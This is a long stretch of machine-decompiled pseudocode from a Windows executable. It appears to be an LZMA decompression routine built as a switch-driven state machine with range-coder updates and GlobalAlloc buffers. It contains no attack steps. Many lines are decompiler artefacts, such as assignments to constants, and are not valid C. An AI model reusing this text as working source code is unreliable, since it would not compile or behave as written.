                  						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                  						__esi =  *(__ebp - 0x60);
                  						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                  						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                  						__ecx =  *(__ebp - 0x3c);
                  						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                  						__ecx =  *(__ebp - 4);
                  						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                  						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                  						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                  						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                  						if( *(__ebp - 0x38) >= 4) {
                  							if( *(__ebp - 0x38) >= 0xa) {
                  								_t97 = __ebp - 0x38;
                  								 *_t97 =  *(__ebp - 0x38) - 6;
                  							} else {
                  								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                  							}
                  						} else {
                  							 *(__ebp - 0x38) = 0;
                  						}
                  						if( *(__ebp - 0x34) == __edx) {
                  							__ebx = 0;
                  							__ebx = 1;
                  							L60:
                  							__eax =  *(__ebp - 0x58);
                  							__edx = __ebx + __ebx;
                  							__ecx =  *(__ebp - 0x10);
                  							__esi = __edx + __eax;
                  							__ecx =  *(__ebp - 0x10) >> 0xb;
                  							__ax =  *__esi;
                  							 *(__ebp - 0x54) = __esi;
                  							__edi = __ax & 0x0000ffff;
                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                  							if( *(__ebp - 0xc) >= __ecx) {
                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  								__cx = __ax;
                  								_t216 = __edx + 1; // 0x1
                  								__ebx = _t216;
                  								__cx = __ax >> 5;
                  								 *__esi = __ax;
                  							} else {
                  								 *(__ebp - 0x10) = __ecx;
                  								0x800 = 0x800 - __edi;
                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                  								__ebx = __ebx + __ebx;
                  								 *__esi = __cx;
                  							}
                  							 *(__ebp - 0x44) = __ebx;
                  							if( *(__ebp - 0x10) >= 0x1000000) {
                  								L59:
                  								if(__ebx >= 0x100) {
                  									goto L54;
                  								}
                  								goto L60;
                  							} else {
                  								L57:
                  								if( *(__ebp - 0x6c) == 0) {
                  									 *(__ebp - 0x88) = 0xf;
                  									goto L170;
                  								}
                  								__ecx =  *(__ebp - 0x70);
                  								__eax =  *(__ebp - 0xc);
                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  								_t202 = __ebp - 0x70;
                  								 *_t202 =  *(__ebp - 0x70) + 1;
                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  								goto L59;
                  							}
                  						} else {
                  							__eax =  *(__ebp - 0x14);
                  							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                  							if(__eax >=  *(__ebp - 0x74)) {
                  								__eax = __eax +  *(__ebp - 0x74);
                  							}
                  							__ecx =  *(__ebp - 8);
                  							__ebx = 0;
                  							__ebx = 1;
                  							__al =  *((intOrPtr*)(__eax + __ecx));
                  							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                  							L40:
                  							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                  							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                  							__ecx =  *(__ebp - 0x58);
                  							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                  							 *(__ebp - 0x48) = __eax;
                  							__eax = __eax + 1;
                  							__eax = __eax << 8;
                  							__eax = __eax + __ebx;
                  							__esi =  *(__ebp - 0x58) + __eax * 2;
                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                  							__ax =  *__esi;
                  							 *(__ebp - 0x54) = __esi;
                  							__edx = __ax & 0x0000ffff;
                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                  							if( *(__ebp - 0xc) >= __ecx) {
                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  								__cx = __ax;
                  								 *(__ebp - 0x40) = 1;
                  								__cx = __ax >> 5;
                  								__ebx = __ebx + __ebx + 1;
                  								 *__esi = __ax;
                  							} else {
                  								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                  								 *(__ebp - 0x10) = __ecx;
                  								0x800 = 0x800 - __edx;
                  								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                  								__ebx = __ebx + __ebx;
                  								 *__esi = __cx;
                  							}
                  							 *(__ebp - 0x44) = __ebx;
                  							if( *(__ebp - 0x10) >= 0x1000000) {
                  								L38:
                  								__eax =  *(__ebp - 0x40);
                  								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                  									while(1) {
                  										if(__ebx >= 0x100) {
                  											break;
                  										}
                  										__eax =  *(__ebp - 0x58);
                  										__edx = __ebx + __ebx;
                  										__ecx =  *(__ebp - 0x10);
                  										__esi = __edx + __eax;
                  										__ecx =  *(__ebp - 0x10) >> 0xb;
                  										__ax =  *__esi;
                  										 *(__ebp - 0x54) = __esi;
                  										__edi = __ax & 0x0000ffff;
                  										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                  										if( *(__ebp - 0xc) >= __ecx) {
                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  											__cx = __ax;
                  											_t169 = __edx + 1; // 0x1
                  											__ebx = _t169;
                  											__cx = __ax >> 5;
                  											 *__esi = __ax;
                  										} else {
                  											 *(__ebp - 0x10) = __ecx;
                  											0x800 = 0x800 - __edi;
                  											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                  											__ebx = __ebx + __ebx;
                  											 *__esi = __cx;
                  										}
                  										 *(__ebp - 0x44) = __ebx;
                  										if( *(__ebp - 0x10) < 0x1000000) {
                  											L45:
                  											if( *(__ebp - 0x6c) == 0) {
                  												 *(__ebp - 0x88) = 0xe;
                  												goto L170;
                  											}
                  											__ecx =  *(__ebp - 0x70);
                  											__eax =  *(__ebp - 0xc);
                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											_t155 = __ebp - 0x70;
                  											 *_t155 =  *(__ebp - 0x70) + 1;
                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  										}
                  									}
                  									L53:
                  									_t172 = __ebp - 0x34;
                  									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                  									L54:
                  									__al =  *(__ebp - 0x44);
                  									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                  									L55:
                  									if( *(__ebp - 0x64) == 0) {
                  										 *(__ebp - 0x88) = 0x1a;
                  										goto L170;
                  									}
                  									__ecx =  *(__ebp - 0x68);
                  									__al =  *(__ebp - 0x5c);
                  									__edx =  *(__ebp - 8);
                  									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                  									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                  									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                  									 *( *(__ebp - 0x68)) = __al;
                  									__ecx =  *(__ebp - 0x14);
                  									 *(__ecx +  *(__ebp - 8)) = __al;
                  									__eax = __ecx + 1;
                  									__edx = 0;
                  									_t191 = __eax %  *(__ebp - 0x74);
                  									__eax = __eax /  *(__ebp - 0x74);
                  									__edx = _t191;
                  									L79:
                  									 *(__ebp - 0x14) = __edx;
                  									L80:
                  									 *(__ebp - 0x88) = 2;
                  									goto L1;
                  								}
                  								if(__ebx >= 0x100) {
                  									goto L53;
                  								}
                  								goto L40;
                  							} else {
                  								L36:
                  								if( *(__ebp - 0x6c) == 0) {
                  									 *(__ebp - 0x88) = 0xd;
                  									L170:
                  									_t568 = 0x22;
                  									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                  									_t535 = 0;
                  									L172:
                  									return _t535;
                  								}
                  								__ecx =  *(__ebp - 0x70);
                  								__eax =  *(__ebp - 0xc);
                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  								_t121 = __ebp - 0x70;
                  								 *_t121 =  *(__ebp - 0x70) + 1;
                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  								goto L38;
                  							}
                  						}
                  					}
                  					L1:
                  					_t534 =  *(_t614 - 0x88);
                  					if(_t534 > 0x1c) {
                  						L171:
                  						_t535 = _t534 | 0xffffffff;
                  						goto L172;
                  					}
                  					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                  						case 0:
                  							if( *(_t614 - 0x6c) == 0) {
                  								goto L170;
                  							}
                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                  							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                  							_t534 =  *( *(_t614 - 0x70));
                  							if(_t534 > 0xe1) {
                  								goto L171;
                  							}
                  							_t538 = _t534 & 0x000000ff;
                  							_push(0x2d);
                  							asm("cdq");
                  							_pop(_t570);
                  							_push(9);
                  							_pop(_t571);
                  							_t610 = _t538 / _t570;
                  							_t540 = _t538 % _t570 & 0x000000ff;
                  							asm("cdq");
                  							_t605 = _t540 % _t571 & 0x000000ff;
                  							 *(_t614 - 0x3c) = _t605;
                  							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                  							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                  							_t613 = (0x300 << _t605 + _t610) + 0x736;
                  							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                  								L10:
                  								if(_t613 == 0) {
                  									L12:
                  									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                  									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                  									goto L15;
                  								} else {
                  									goto L11;
                  								}
                  								do {
                  									L11:
                  									_t613 = _t613 - 1;
                  									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                  								} while (_t613 != 0);
                  								goto L12;
                  							}
                  							if( *(_t614 - 4) != 0) {
                  								GlobalFree( *(_t614 - 4));
                  							}
                  							_t534 = GlobalAlloc(0x40, 0x600); // executed
                  							 *(_t614 - 4) = _t534;
                  							if(_t534 == 0) {
                  								goto L171;
                  							} else {
                  								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                  								goto L10;
                  							}
                  						case 1:
                  							L13:
                  							__eflags =  *(_t614 - 0x6c);
                  							if( *(_t614 - 0x6c) == 0) {
                  								 *(_t614 - 0x88) = 1;
                  								goto L170;
                  							}
                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                  							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                  							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                  							_t45 = _t614 - 0x48;
                  							 *_t45 =  *(_t614 - 0x48) + 1;
                  							__eflags =  *_t45;
                  							L15:
                  							if( *(_t614 - 0x48) < 4) {
                  								goto L13;
                  							}
                  							_t546 =  *(_t614 - 0x40);
                  							if(_t546 ==  *(_t614 - 0x74)) {
                  								L20:
                  								 *(_t614 - 0x48) = 5;
                  								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                  								goto L23;
                  							}
                  							 *(_t614 - 0x74) = _t546;
                  							if( *(_t614 - 8) != 0) {
                  								GlobalFree( *(_t614 - 8));
                  							}
                  							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                  							 *(_t614 - 8) = _t534;
                  							if(_t534 == 0) {
                  								goto L171;
                  							} else {
                  								goto L20;
                  							}
                  						case 2:
                  							L24:
                  							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                  							 *(_t614 - 0x84) = 6;
                  							 *(_t614 - 0x4c) = _t553;
                  							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                  							goto L132;
                  						case 3:
                  							L21:
                  							__eflags =  *(_t614 - 0x6c);
                  							if( *(_t614 - 0x6c) == 0) {
                  								 *(_t614 - 0x88) = 3;
                  								goto L170;
                  							}
                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                  							_t67 = _t614 - 0x70;
                  							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                  							__eflags =  *_t67;
                  							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                  							L23:
                  							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                  							if( *(_t614 - 0x48) != 0) {
                  								goto L21;
                  							}
                  							goto L24;
                  						case 4:
                  							goto L133;
                  						case 5:
                  							goto L137;
                  						case 6:
                  							goto L0;
                  						case 7:
                  							__eflags =  *(__ebp - 0x40) - 1;
                  							if( *(__ebp - 0x40) != 1) {
                  								__eax =  *(__ebp - 0x24);
                  								 *(__ebp - 0x80) = 0x16;
                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                  								__eax =  *(__ebp - 0x28);
                  								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                  								__eax =  *(__ebp - 0x2c);
                  								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                  								__eax = 0;
                  								__eflags =  *(__ebp - 0x38) - 7;
                  								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                  								__al = __al & 0x000000fd;
                  								__eax = (__eflags >= 0) - 1 + 0xa;
                  								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                  								__eax =  *(__ebp - 4);
                  								__eax =  *(__ebp - 4) + 0x664;
                  								__eflags = __eax;
                  								 *(__ebp - 0x58) = __eax;
                  								goto L68;
                  							}
                  							__eax =  *(__ebp - 4);
                  							__ecx =  *(__ebp - 0x38);
                  							 *(__ebp - 0x84) = 8;
                  							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                  							goto L132;
                  						case 8:
                  							__eflags =  *(__ebp - 0x40);
                  							if( *(__ebp - 0x40) != 0) {
                  								__eax =  *(__ebp - 4);
                  								__ecx =  *(__ebp - 0x38);
                  								 *(__ebp - 0x84) = 0xa;
                  								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                  							} else {
                  								__eax =  *(__ebp - 0x38);
                  								__ecx =  *(__ebp - 4);
                  								__eax =  *(__ebp - 0x38) + 0xf;
                  								 *(__ebp - 0x84) = 9;
                  								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                  								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                  							}
                  							goto L132;
                  						case 9:
                  							__eflags =  *(__ebp - 0x40);
                  							if( *(__ebp - 0x40) != 0) {
                  								goto L89;
                  							}
                  							__eflags =  *(__ebp - 0x60);
                  							if( *(__ebp - 0x60) == 0) {
                  								goto L171;
                  							}
                  							__eax = 0;
                  							__eflags =  *(__ebp - 0x38) - 7;
                  							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                  							__eflags = _t258;
                  							0 | _t258 = _t258 + _t258 + 9;
                  							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                  							goto L75;
                  						case 0xa:
                  							__eflags =  *(__ebp - 0x40);
                  							if( *(__ebp - 0x40) != 0) {
                  								__eax =  *(__ebp - 4);
                  								__ecx =  *(__ebp - 0x38);
                  								 *(__ebp - 0x84) = 0xb;
                  								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                  								goto L132;
                  							}
                  							__eax =  *(__ebp - 0x28);
                  							goto L88;
                  						case 0xb:
                  							__eflags =  *(__ebp - 0x40);
                  							if( *(__ebp - 0x40) != 0) {
                  								__ecx =  *(__ebp - 0x24);
                  								__eax =  *(__ebp - 0x20);
                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                  							} else {
                  								__eax =  *(__ebp - 0x24);
                  							}
                  							__ecx =  *(__ebp - 0x28);
                  							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                  							L88:
                  							__ecx =  *(__ebp - 0x2c);
                  							 *(__ebp - 0x2c) = __eax;
                  							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                  							L89:
                  							__eax =  *(__ebp - 4);
                  							 *(__ebp - 0x80) = 0x15;
                  							__eax =  *(__ebp - 4) + 0xa68;
                  							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                  							goto L68;
                  						case 0xc:
                  							L99:
                  							__eflags =  *(__ebp - 0x6c);
                  							if( *(__ebp - 0x6c) == 0) {
                  								 *(__ebp - 0x88) = 0xc;
                  								goto L170;
                  							}
                  							__ecx =  *(__ebp - 0x70);
                  							__eax =  *(__ebp - 0xc);
                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  							_t334 = __ebp - 0x70;
                  							 *_t334 =  *(__ebp - 0x70) + 1;
                  							__eflags =  *_t334;
                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  							__eax =  *(__ebp - 0x2c);
                  							goto L101;
                  						case 0xd:
                  							goto L36;
                  						case 0xe:
                  							goto L45;
                  						case 0xf:
                  							goto L57;
                  						case 0x10:
                  							L109:
                  							__eflags =  *(__ebp - 0x6c);
                  							if( *(__ebp - 0x6c) == 0) {
                  								 *(__ebp - 0x88) = 0x10;
                  								goto L170;
                  							}
                  							__ecx =  *(__ebp - 0x70);
                  							__eax =  *(__ebp - 0xc);
                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  							_t365 = __ebp - 0x70;
                  							 *_t365 =  *(__ebp - 0x70) + 1;
                  							__eflags =  *_t365;
                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  							goto L111;
                  						case 0x11:
                  							L68:
                  							__esi =  *(__ebp - 0x58);
                  							 *(__ebp - 0x84) = 0x12;
                  							goto L132;
                  						case 0x12:
                  							__eflags =  *(__ebp - 0x40);
                  							if( *(__ebp - 0x40) != 0) {
                  								__eax =  *(__ebp - 0x58);
                  								 *(__ebp - 0x84) = 0x13;
                  								__esi =  *(__ebp - 0x58) + 2;
                  								goto L132;
                  							}
                  							__eax =  *(__ebp - 0x4c);
                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                  							__ecx =  *(__ebp - 0x58);
                  							__eax =  *(__ebp - 0x4c) << 4;
                  							__eflags = __eax;
                  							__eax =  *(__ebp - 0x58) + __eax + 4;
                  							goto L130;
                  						case 0x13:
                  							__eflags =  *(__ebp - 0x40);
                  							if( *(__ebp - 0x40) != 0) {
                  								_t469 = __ebp - 0x58;
                  								 *_t469 =  *(__ebp - 0x58) + 0x204;
                  								__eflags =  *_t469;
                  								 *(__ebp - 0x30) = 0x10;
                  								 *(__ebp - 0x40) = 8;
                  								L144:
                  								 *(__ebp - 0x7c) = 0x14;
                  								goto L145;
                  							}
                  							__eax =  *(__ebp - 0x4c);
                  							__ecx =  *(__ebp - 0x58);
                  							__eax =  *(__ebp - 0x4c) << 4;
                  							 *(__ebp - 0x30) = 8;
                  							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                  							L130:
                  							 *(__ebp - 0x58) = __eax;
                  							 *(__ebp - 0x40) = 3;
                  							goto L144;
                  						case 0x14:
                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                  							__eax =  *(__ebp - 0x80);
                  							goto L140;
                  						case 0x15:
                  							__eax = 0;
                  							__eflags =  *(__ebp - 0x38) - 7;
                  							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                  							__al = __al & 0x000000fd;
                  							__eax = (__eflags >= 0) - 1 + 0xb;
                  							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                  							goto L120;
                  						case 0x16:
                  							__eax =  *(__ebp - 0x30);
                  							__eflags = __eax - 4;
                  							if(__eax >= 4) {
                  								_push(3);
                  								_pop(__eax);
                  							}
                  							__ecx =  *(__ebp - 4);
                  							 *(__ebp - 0x40) = 6;
                  							__eax = __eax << 7;
                  							 *(__ebp - 0x7c) = 0x19;
                  							 *(__ebp - 0x58) = __eax;
                  							goto L145;
                  						case 0x17:
                  							L145:
                  							__eax =  *(__ebp - 0x40);
                  							 *(__ebp - 0x50) = 1;
                  							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                  							goto L149;
                  						case 0x18:
                  							L146:
                  							__eflags =  *(__ebp - 0x6c);
                  							if( *(__ebp - 0x6c) == 0) {
                  								 *(__ebp - 0x88) = 0x18;
                  								goto L170;
                  							}
                  							__ecx =  *(__ebp - 0x70);
                  							__eax =  *(__ebp - 0xc);
                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  							_t484 = __ebp - 0x70;
                  							 *_t484 =  *(__ebp - 0x70) + 1;
                  							__eflags =  *_t484;
                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  							L148:
                  							_t487 = __ebp - 0x48;
                  							 *_t487 =  *(__ebp - 0x48) - 1;
                  							__eflags =  *_t487;
                  							L149:
                  							__eflags =  *(__ebp - 0x48);
                  							if( *(__ebp - 0x48) <= 0) {
                  								__ecx =  *(__ebp - 0x40);
                  								__ebx =  *(__ebp - 0x50);
                  								0 = 1;
                  								__eax = 1 << __cl;
                  								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                  								__eax =  *(__ebp - 0x7c);
                  								 *(__ebp - 0x44) = __ebx;
                  								goto L140;
                  							}
                  							__eax =  *(__ebp - 0x50);
                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                  							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                  							__eax =  *(__ebp - 0x58);
                  							__esi = __edx + __eax;
                  							 *(__ebp - 0x54) = __esi;
                  							__ax =  *__esi;
                  							__edi = __ax & 0x0000ffff;
                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                  							__eflags =  *(__ebp - 0xc) - __ecx;
                  							if( *(__ebp - 0xc) >= __ecx) {
                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  								__cx = __ax;
                  								__cx = __ax >> 5;
                  								__eax = __eax - __ecx;
                  								__edx = __edx + 1;
                  								__eflags = __edx;
                  								 *__esi = __ax;
                  								 *(__ebp - 0x50) = __edx;
                  							} else {
                  								 *(__ebp - 0x10) = __ecx;
                  								0x800 = 0x800 - __edi;
                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                  								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                  								 *__esi = __cx;
                  							}
                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                  							if( *(__ebp - 0x10) >= 0x1000000) {
                  								goto L148;
                  							} else {
                  								goto L146;
                  							}
                  						case 0x19:
                  							__eflags = __ebx - 4;
                  							if(__ebx < 4) {
                  								 *(__ebp - 0x2c) = __ebx;
                  								L119:
                  								_t393 = __ebp - 0x2c;
                  								 *_t393 =  *(__ebp - 0x2c) + 1;
                  								__eflags =  *_t393;
                  								L120:
                  								__eax =  *(__ebp - 0x2c);
                  								__eflags = __eax;
                  								if(__eax == 0) {
                  									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                  									goto L170;
                  								}
                  								__eflags = __eax -  *(__ebp - 0x60);
                  								if(__eax >  *(__ebp - 0x60)) {
                  									goto L171;
                  								}
                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                  								__eax =  *(__ebp - 0x30);
                  								_t400 = __ebp - 0x60;
                  								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                  								__eflags =  *_t400;
                  								goto L123;
                  							}
                  							__ecx = __ebx;
                  							__eax = __ebx;
                  							__ecx = __ebx >> 1;
                  							__eax = __ebx & 0x00000001;
                  							__ecx = (__ebx >> 1) - 1;
                  							__al = __al | 0x00000002;
                  							__eax = (__ebx & 0x00000001) << __cl;
                  							__eflags = __ebx - 0xe;
                  							 *(__ebp - 0x2c) = __eax;
                  							if(__ebx >= 0xe) {
                  								__ebx = 0;
                  								 *(__ebp - 0x48) = __ecx;
                  								L102:
                  								__eflags =  *(__ebp - 0x48);
                  								if( *(__ebp - 0x48) <= 0) {
                  									__eax = __eax + __ebx;
                  									 *(__ebp - 0x40) = 4;
                  									 *(__ebp - 0x2c) = __eax;
                  									__eax =  *(__ebp - 4);
                  									__eax =  *(__ebp - 4) + 0x644;
                  									__eflags = __eax;
                  									L108:
                  									__ebx = 0;
                  									 *(__ebp - 0x58) = __eax;
                  									 *(__ebp - 0x50) = 1;
                  									 *(__ebp - 0x44) = 0;
                  									 *(__ebp - 0x48) = 0;
                  									L112:
                  									__eax =  *(__ebp - 0x40);
                  									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                  									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                  										_t391 = __ebp - 0x2c;
                  										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                  										__eflags =  *_t391;
                  										goto L119;
                  									}
                  									__eax =  *(__ebp - 0x50);
                  									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                  									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                  									__eax =  *(__ebp - 0x58);
                  									__esi = __edi + __eax;
                  									 *(__ebp - 0x54) = __esi;
                  									__ax =  *__esi;
                  									__ecx = __ax & 0x0000ffff;
                  									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                  									__eflags =  *(__ebp - 0xc) - __edx;
                  									if( *(__ebp - 0xc) >= __edx) {
                  										__ecx = 0;
                  										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                  										__ecx = 1;
                  										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                  										__ebx = 1;
                  										__ecx =  *(__ebp - 0x48);
                  										__ebx = 1 << __cl;
                  										__ecx = 1 << __cl;
                  										__ebx =  *(__ebp - 0x44);
                  										__ebx =  *(__ebp - 0x44) | __ecx;
                  										__cx = __ax;
                  										__cx = __ax >> 5;
                  										__eax = __eax - __ecx;
                  										__edi = __edi + 1;
                  										__eflags = __edi;
                  										 *(__ebp - 0x44) = __ebx;
                  										 *__esi = __ax;
